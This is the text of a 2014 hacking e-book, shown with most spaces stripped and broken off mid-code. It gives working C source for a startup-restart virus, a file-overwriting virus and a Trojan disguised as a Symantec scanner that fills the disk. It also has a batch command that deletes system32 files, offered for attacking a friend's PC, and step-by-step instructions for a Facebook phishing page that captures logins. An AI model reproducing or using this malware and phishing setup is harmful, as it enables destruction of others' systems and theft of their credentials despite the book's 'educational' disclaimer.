TableofContents
Copyrights
Preface
HowtocompileCPrograms?
HackingWindowsExperienceIndex.
HowtoTesttheWorkingofyourAntivirus–EICARTest?
AVirusProgramtoRestarttheComputeratEveryStartup.
AttackYourFriend’sPCwithaSmallVirus.
HackFacebookbyPhishing.
HiddenCodesforAndroid.
HowtoCreateaComputerVirus?
HowtomakeaTrojanHorse?
Howtocreatefolderreplicatorvirususingnotepad?
Hackingyourfriends’password.
HackpasswordsbyhijackingHTTPcookieusingFireSheep.
Hackyourfriends’phonesthroughBluetooth.
HackingwebsitesthroughSQLInjection.
RegistryHackstotweakyourWindowsPC.
CreatingabatchvirusthatkillsyourAntiVirus.
HowtofindtheIPAddressofanyone?
HowtotraceanyIPAddress?
HowtoHackWindowsAdministratorPassword?
HackingFacebookandWebsites–
BeSafe
ByTechdroids
Copyright©2014AgelessReads
Allrightsreservedworldwide.
Nopartofthisbookcanbeusedorcopiedwithoutpermission.
Preface
Hackingisnotacrime,itisatalent.
KNOWHACKINGBUTNOHACKING!
Twoyearsback,IstartedaFacebookPagecalledTechdroids,givingawaysoftwaresand
showing some hacks and tricks. It wasn’t a long time, since I started getting numerous
requests, saying that their beloved ones or friends hacked into their accounts and they
wantedarevengetobetakenbyhackingtheirs.
Mebeingahacker,Ilearnedhackingbytestingitonmyself.
Ihaven’thackedanyonesaccountsorwebsites,notbecauseIcan’t.
ItisapersonalprincipleIfollow,soIcouldn’treplyorrespondtoanyrequestsIgot.
ButnowItooksometimetowriteaboutthisandgetyouaglimpseonhoweasyitisto
hack, thereby advising everyone to increase their SECURITY MEASURES and to BE
SAFE!
In this book you will find SEVENTEEN HACKS that will turn you to a PRO. All the
hacksyouwillfindinthisbookareforEDUCATIONALPURPOSESonly.
HowtocompileCPrograms?
Before moving further, kindly go through this article. Later you will find two articles
whicharebasedonthisapplication.
1)DownloadBorland*++compiler5.5(forWindows)fromthefollowinglink.
/>2)Afteryoudownload,runthefileC++5.51.exe.Thedefaultinstallationpathwouldbe:
C:\Borland\BCC55
HowtoconfigureBorlandC++compiler?
1)AfteryouinstallBorlandC++compiler,createtwonewTextDocuments.
2)OpenthefirstNewTextDocument.txtfileandaddthefollowingtwolinesintoit:
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt to
bcc32.cfg.
3)OpenthesecondNewTextDocument(2).txtfileandaddthefollowinglineintoit:
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Rename the file from New Text Document (2).txt to
ilink32.cfg.
4)Nowcopythetwofilesbcc32.cfgandilink32.cfg,navigatetoC:\Borland\BCC55\Bin
andpastethem.
HowtoCompiletheCSourceCode(.Cfiles)?
Youneedtoplacethe.C(example.c)filetobecompiledinthefollowinglocation:
C:\Borland\BCC55\Bin
Nowgotothecommandprompt(Start->Run->typecmd->Enter)
Makethefollowingpathasthepresentworkingdirectory(usetheCDcommand):
C:\Borland\BCC55\Bin
Tocompilethefile(example.c),usethefollowingcommand:
bcc32example.c
Nowifthereexistsnoerrorinthesourcecode,you’llgetacompiledexecutablemodule
(example.exe)inthesamelocation(C:\Borland\BCC55\Bin).
Nowyouhavesuccessfullycompiledthesourcecodeintoanexecutablefile(.exefile).
HackingWindowsExperienceIndex.
1.Followthebelowmentioned,specifiedpath
C:>>Windows>>Performance>>Winsat>>DataStore
Note: C will be the default directory where Windows installed. If you have installed
windows any other photo that drive and locate the windows folder and continue as
mentionedabove.
2.IntheDataStorefolderyoucanseealotofXMLfiles,rightclickandselectsortbydate
andfindthelatestfile.
3.JustcopythatfileintodesktopandopenitwithnotepadandsearchforSystemScore
(CTRL+F).Normallyitwillbetheheadsectionitselfandthereyoucanseethevalueof
yoursystem,changeittoanynumberandsaveit.
4.Copybackthisfiletoitsoriginaldirectory,tothefolderDataStore.
5. Now go back and check the system properties, you can find the new value for your
system.
HowtoTesttheWorkingofyourAntivirus–EICARTest?
Thisprocesscanbeusedbypeople,companiesandantivirusprogrammerstesttheproper
functioningoftheantivirusorantimalwaresoftwarewithouthavingtodealwiththereal
computerviruswhichcancausedamagetothecomputer.Hereisastep-by-stepprocedure
totestyourantivirus.
1.Openanotepad(NewTextDocument.TXT)andcopythefollowingcodeexactlyonto
it,andsavethenotepad.
EICARTestcode
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVI*US-TESTFILE!$H+H*
2.RenamethefilefromNewTextDocument.TXTtomyfile.com
3.Nowruntheantivirusscanonthismyfile.comfile.
If the antivirus is functioning properly on your computer, then it should generate a
warningandimmediatelydeleteth*fileuponscanning.Otherwise,youmayhavetoreinstallyourantivirus.
NOTE:Mostantiviruswillpop-outawarningmessageintheStep-1itself
Youcanalsoplacethemyfile.comfileinaZIPorRARfileandrunascanonitsoasto
ensure whether your antivirus can detect the test string in the compressed archive. Any
antivirus when scanning this file will respond exactly as it will do for a genuine
virus/malicious code. This test will cause no damage to your computer even though the
antiviruswillflagitasamaliciousscript.Henceitisthesafestmethodtotesttheproper
functioningofanyantivirus.
AVirusProgramtoRestarttheComputeratEveryStartup.
Here,thevirusneedstobeexecutedonlyonceandfromthenon,itwillcarryouttherest
oftheoperationonitsown.WehaveprogrammedthisvirususingtheClanguage.Ifyou
are familiar with the C language, then it is too easy to understand the logic behind the
coding.Thecodeisgivendownbelow.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
intfound,drive_no;
charbuff[128];
voidfindroot()
{
intdone;
structffblkffblk;//Fileblockstructure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC);//todeterminetherootdrive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the
virusisalreadyinstalledornot
if(done==0)
{
found=1;//meansthatthesystemisalreadyinfected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=2;
return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
voidmain()
{
FILE*self,*target;
findroot();
if(found==0)//ifthesystemisnotalreadyinfected
{
self=fopen(_argv[0],“rb”);//Thevirusfileopen’sitself
switch(drive_no)
{
case1:
target=fopen(“C:\windows\system\sysres.exe”,“wb”);//toplaceacopyofitselfinaremote
place
system(“REG
ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v sres \/t
REG_SZ\/dC:\windows\system\sysres.exe”);//putthisfiletoregistryforstarup
break;
case2:
target=fopen(“D:\windows\system\sysres.exe”,“wb”);
system(“REG
ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v sres \/t
REG_SZ\/dD:\windows\system\sysres.exe”);
break;
case3:
target=fopen(“E:\windows\system\sysres.exe”,“wb”);
system(“REG
ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v sres \/t
REG_SZ\/dE:\windows\system\sysres.exe”);
break;
case4:
target=fopen(“F:\windows\system\sysres.exe”,“wb”);
system(“REG
ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v sres \/t
REG_SZ\/dF:\windows\system\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown-r-t0”);//ifthesystemisalreadyinfectedthenjustgiveacommandto
restart
}
TestingandremovingthevirusfromyourPC:
YoucancompileandtestthisvirusonyourownPCwithoutanyfear.Totest,justdoubleclickthesysres.exefileandrestartthesystemmanually.Fromnowon,everytimethePC
isbootedandthedesktopisloaded,yourPCwillrestartautomaticallyagainandagain.
Itwillnotdoanyharmapartfromautomaticallyrestartingyoursystem.Aftertestingit,
youcanremovethevirusbyfollowingthebelowmentionedsteps:
Rebootyourcomputerinthesafemode.
Goto:
%systemroot%\Windows\System
(%systemroot%canbeC,D,EorF)
Youwillfindafilebynamesysres.exe,deleteit.
Typeregeditinrun.Youwillgototheregistryeditor.Herenavigateto:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
There,ontherightsite,youwillseeanentrybyname“sres“.Deletethisentry.That’sit.
Youhavenowremovedthisvirussuccessfully.
AttackYourFriend’sPCwithaSmallVirus.
1.OpenNotepad
2.Writetheabovecommand:-delc:\WINDOWS\system32\**/q
3.Savetheabovenotepadwiththeextension“.bator.cmd”asyouwant.
4.Don’tdoubleclickthefile,otherwiseyouareintrouble.
5. Because the file you created deletes all files from ursystem32 folder and when you
restartyourPCitwillnotstartbecausesystemcannotfindthefilesinthesystem32folder
whichisrequiredatthetimeofbooting.
6.Youcanalsotesttheabovebycreatingafakefolderletsupposewindows1inC:.Copy
someoldfilesinitandjustfollowtheabovecommand.Bydoubleclickingthebatorcmd
fileyourallfilesautomaticallygetdeleted.
8.Youcantrythisfileinanyone`scomputer.(Thiswillresultincausingdamagetothe
computer,sothinkagainbeforetryingthisonanyone’sPC)
HackFacebookbyPhishing.
1)DownloadtheACTION.PHPandHTMLfilefromthegivenlink
/>2)OpentheHTMLFileinNotepad
PressCTRL+Fandsearch‘ACTION’
Itappearslikethis
action= />Replaceonlywithyourbyethost.comsite.
3)Nowgoaheadandsignupatbytehost.com.
4)Aftersigningup,gotoFileManager.
5)Next,gotoHTDocs,deletetheexistingfiles(ACTION.PHPandotherHTMLfiles).
6)NowfirstuploadyourEditedHTMLPage(INDEX.HTML)andnextthePHPFile.
7) Give your bytehost.com website to your friends and they will login thinking its their
FacebookLoginPage,butweknowthisisafakeone.
8)Nexttheywillclickonlogin,theywillberedirectedtoaFacebookpageofours.
9)Youcanchangethepagewhereyouwantthemtoberedirected.
GotoHTDocsandeditACTIONS.PHPfile,replacethegivensitewithanysiteofyour
choice,thiswillbethesitewherethevictimwillberedirected.
10) When your victim login, type your bytehost.com site along with victims.html and
pressENTER.
Eg:HTTP://YOURSITE.BYETHOST.COM/VICTIMS.HTML
HiddenCodesforAndroid.
*#06#-IMEInumber
*#0*#-Entertheservicemenu
*#*#4636#*#*-Phoneinformation,usagestatisticsandbattery
*#*#34971539#*#*-Detailedcamerainformation
*#*#273282*255*663282*#*#*-Immediatebackupofallmediafiles
*#*#197328640#*#*-Enabletestmodeforservice
*#*#232339#*#*-WirelessLANtests
*#*#0842#*#*-Backlight/vibrationtest
*#*#2664#*#*-Testthetouchscreen
*#*#1111#*#*-FTAsoftwareversion(1234inthesamecodewillgivePDAand
Firmwareversion)
*#12580*369#-Softwareandhardwareinfo
*#9090#-Diagnosticconfiguration
*#872564#-USBloggingcontrol
*#9900#-Systemdumpmode
*#301279#-HSDPA/HSUPAControlMenu
*#7465625#-Viewphonelockstatus
*#*#7780#*#*-Resetthe/datapartitiontofactorystate
*2767*3855#-Formatdevicetofactorystate(willdeleteeverythingonthephone)
##7764726-HiddenservicemenuforMotorolaDroid
HowtoCreateaComputerVirus?
ThisprogramisanexampleofhowtocreateavirusinC.Thisprogramdemonstratesa
simplevirusprogramwhichuponexecution(Running)createsacopyofitselfintheother
file. Thus, it destroys other files from infecting them. But the virus infected file is also
capableofspreadingtheinfectiontoanotherfileandsoon.Here’sthesourcecodeofthe
virusprogram.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE*virus,*host;
intdone,a=0;
unsignedlongx;
charbuff[2048];
structffblkffblk;
clock_tst,end;
voidmain()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);//Searchforafilewithanyextension(*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL)gotonext;
x=89088;
printf(“Infecting%s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE!(TotalFilesInfected=%d)”,a);
end=clock();
printf(“TIMETAKEN=%fSEC\n”,
(end-st)/CLK_TCK);
getch();
}
CompilingMethod:
UsingBorlandTC++3.0(16-BIT):
1.Loadtheprograminthecompiler,pressAlt-F9tocompile.
2.PressF9togeneratetheEXEfile(DonotpressCTRLF9,thiswillinfectallthefilesin
Curdirectoryincludingyourcompiler).
3.NotedownthesizeofthegeneratedEXEfileinbytes(CheckEXEFilepropertiesfor
itssize).
4.*ChangethevalueofXinthesourcecodewiththenoteddownsize
IntheaboveSourceCodeX=89088;Changeit).
5.OnceagainfollowtheStep1&Step2.
NowthegeneratedEXEFileisreadytoinfect.
USINGBORLANDC++5.5(32-BIT):
1.Compileonce,notedownthegeneratedEXEfilelengthinbytes.
2.ChangethevalueofXinsourcecodetothislengthinbytes.
3.Recompileit,thenewEXEfileisreadytobeinfected.
HOWTOTEST:
1.Openthenewemptyfolder.
2.PutsomeEXEfiles(Bysearchingfor*.EXEinsearchandpastinginthenewfolder).
3. Run the virus EXE file, there you will see all the files in the current directory get
infected.
HowtomakeaTrojanHorse?
TheTrojanHorsewhichwillbecreatedhereactsasanAntiVirusprogramthatscansthe
computerandremovesthethreats.Butinrealityitdoesnothingbutoccupytheharddisk
spaceontherootdrivebyjustfillingitupwithahugejunkfile.
Therateatwhichitfillsuptheharddiskspaceittoohigh.Asaresult,thediskgetsfilled
upto100%withinminutesofrunningthisTrojan.Oncethediskspaceisfull,theTrojan
reports that the scan is complete. The victim will not be able to clean up the hard disk
spaceusinganycleanupprogram.ThisisbecausetheTrojanintelligentlycreatesahuge
fileintheWindows\System32folderwiththe.dllextension.
Sincethejunkfilehasthe.dllextensionitisoftenignoredbydiskcleanupsoftwares.So
forthevictim,thereisnowaytorecovertheharddiskspaceunlessreformattinghisdrive.
ThecodefortheTrojanHorseislisteddownbelow,youneedtocomplieittoobtainthe
executable.
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE*a,*t,*b;
intr,status,vir_count;
doublei;
char ch[]=“CREATING A HUGE FILE FOR OCCUPYING HARDDISK
SPACE”,choice;
voideatspace(void);
voidfindroot(void);
voidshowstatus(void);
voiddraw(void);
voidaccept(void);
voidmain()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs(“ANALYZINGYOURSYSTEM.PLEASEWAIT…”);
sleep(3);
gotoxy(12,8);
delline();
cputs(“PRESSANYKEYTOSTARTTHESYSTEMSCAN…”);
getch();
gotoxy(12,8);
delline();
findroot();
}
voidaccept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs(“THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN
THISPROGRAMITWILL\n\rEATUPYOURFULLHARDDISKSPACEONROOT
DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO
CLEANUPTHEDAMAGEYOU'VETODELETETHEFILE"spceshot.dll"LOCATED
IN\n\n\r"%windir%\System32".\n\n\rIFYOUWISHTORUNTHEPROGRAMPRESS
ENTER,OTHERWISEPRESSANYKEYTOQUIT.”);
if((choice=getch())!=13)
exit(0);
}
voiddraw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs(“********************************************************”);
gotoxy(12,6);
cputs(“********************************************************”);
gotoxy(12,3);
cputs(“*\n\b*\n\b*\n\b”);
gotoxy(67,3);
cputs(“*\n\b*\n\b*\n\b”);
gotoxy(14,4);
cputs(“SYMANTECSECURITYSCAN-2009(QUICKSYSTEMSCANNER)”);
}
voidfindroot()
{
t=fopen(“C:\windows\explorer.exe”,“rb”);
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen(“C:\windows\system32\spceshot.dll”,“rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEMSCANWASINTERRUPTED.TRYAGAINLATER!”);
getch();
exit(1);
}
b=fopen(“C:\windows\system32\spceshot.dll”,“wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen(“D:\windows\explorer.exe”,“rb”);
if(t!=NULL)
{
fclose(t);
a=fopen(“D:\windows\system32\spceshot.dll”,“rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEMSCANWASINTERRUPTED.TRYAGAINLATER!”);
getch();
exit(1);
}
b=fopen(“D:\windows\system32\spceshot.dll”,“wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen(“E:\windows\explorer.exe”,“rb”);
if(t!=NULL)
{
fclose(t);
a=fopen(“E:\windows\system32\spceshot.dll”,“rb”);